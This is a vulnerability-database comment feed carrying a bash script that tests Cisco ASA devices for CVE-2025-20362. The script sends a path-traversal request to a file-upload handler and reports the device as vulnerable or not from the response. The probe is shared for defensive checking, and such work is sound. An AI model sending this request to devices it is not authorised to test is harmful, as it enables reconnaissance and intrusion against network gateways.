https://cve.circl.lu/comments/feed 2025-10-20T20:47:14.141832+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent comments. https://cve.circl.lu/comment/9b4cf20c-8f3e-4626-8fdb-9a78038a672d 2025-10-20T20:47:14.148737+00:00 Paul Jung http://cve.circl.lu/user/thanat0s The script is available there to check if an ASA is vulnerable. https://gist.cnw.circl.lu/alexandre.dulaunoy/95ca6ae6259e4c8b899b916ee8b3d4a6 ```bash #!/bin/bash # CIRCL - 2025 # Test CVE 2025-20362 # Ref : https://attackerkb.com/topics/Szq5u0xgUX/cve-2025-20362/rapid7-analysis if [ -z "$1" ]; then echo "Test for CVE-2025-20362" echo "Usage: $0 <IP>" exit 1 fi IP="$1" echo "Looking for CVE-2025-20362" response=$(OPENSSL_CONF=<( echo -e 'openssl_conf = openssl_init\n\n[openssl_init]\nssl_conf = ssl_sect\n\n[ssl_sect]' echo -e 'system_default = system_default_sect\n\n[system_default_sect]\nOptions = UnsafeLegacyRenegotiation\n' cat /etc/ssl/openssl.cnf ) curl "https://$IP/+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz" \ -S --insecure -v -o - --path-as-is 2>&1) if echo "$response" | grep -q "HTTP/1.1 404"; then echo "Not vulnerable" elif echo "$response" | grep -q "HTTP/1.1 200"; then echo "Vulnerable" fi ``` 2025-10-06T16:25:58.212700+00:00